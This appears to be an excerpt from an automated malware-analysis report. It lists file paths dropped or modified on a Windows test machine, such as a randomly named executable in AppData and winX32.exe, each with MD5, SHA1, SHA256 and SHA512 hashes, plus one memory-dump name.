SHA512 f7cb58a9001821cbeba7720d724715d7d3c58e2518ef36eb234095023d498bbf49a25214ad15f8297afbfdb8f26001b8b18495c64daec6a3deb4490f347dc892

C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe

MD5 2b8f487213f3da1f42779e22d7b02d1a
SHA1 77c96429d6facbd1900290c9cbfed378103b8e01
SHA256 a4da37e92ca54c8851ad144fba875b61e2018f69bbe43b11926d8f8d831b56f0
SHA512 2db88a30fdfc1e859edb7229b2073449b5d57640e484e21d78047fd674fc194c2c790995621b4d0ed7927ec06e8325c7333a1893227e50d38b2559fc267cc6bf

memory/6288-16528-0x0000000000BD0000-0x0000000000CB6000-memory.dmp

C:\Users\Admin\Desktop\Files\winX32.exe

MD5 eee37f6f66eafa13d9555dfc9ccb3805
SHA1 c9b2dd6b4bd464cb767b5ff1260dc07e223cd0b8
SHA256 ca569ad2e113c57c5ddeb1770ae4d63f579df3504306097ff8a16b1cb37dcaa9
SHA512 9bf9709f3a1dcdf97d7c88e133702f0c46756125b65adc7b6b3d61ed7b624aa5212729f7fe95c35ef1d457175c3613b4deaf625268c9651e8bdd57201c379218

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 4bd39015c30927b5aade8b354ae4967d
SHA1 e74e6c5d906f71736d9d5410daaa087f28ee78bd
SHA256 4b85f8a124c2a808e6f7e327354aaab86403dd3270d8e0f0e182ca3587d0a8d9
SHA512 ede8db463da500f4272fcdc2901a51b9196818d5f4de38294d43522a4636210f4cd7f1776f72e912f98b96f30d1491c9e4d817a1f6f760f3e780bd196affcbe4

C:\Users\Admin\AppData\Roaming\app

MD5 bbcd2be775370c1e106e66d077a93f3b
SHA1 a44b6a98f30e3275fc304bc3b29e0eab8ae47f20
SHA256 a7aa76f137ba550c381cfb8e5195a01963ae49db167e1cd1e0a8b902ed81eda1
SHA512 bb6e0d1f24253a9525fd538debf8ca68eb7078cb8539140c184331a854ecdea192fbcc314c4154a0a474c9aec41a79efeb8150922454c3c9e71eeb5297ae2f72

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.exe.log

MD5 b4e91d2e5f40d5e2586a86cf3bb4df24
SHA1 31920b3a41aa4400d4a0230a7622848789b38672
SHA256 5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210
SHA512 968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 592ab7edba153a868690f737ca51b7e2
SHA1 aa5381cd2f1b7ae954b369212b748c5d348e3002
SHA256 7632ef4855cf6d0ec1b69def6853378ca049484b4361e10139bbb727a68fe03a
SHA512 c26c4fa0f310c8932bdaff7c83d5081214ebf5109a71181767cccc9adbc0233d18ab9627e01f3b3f83f7ffdde71af0cda6e6c2345845f07650f6108a5d98682e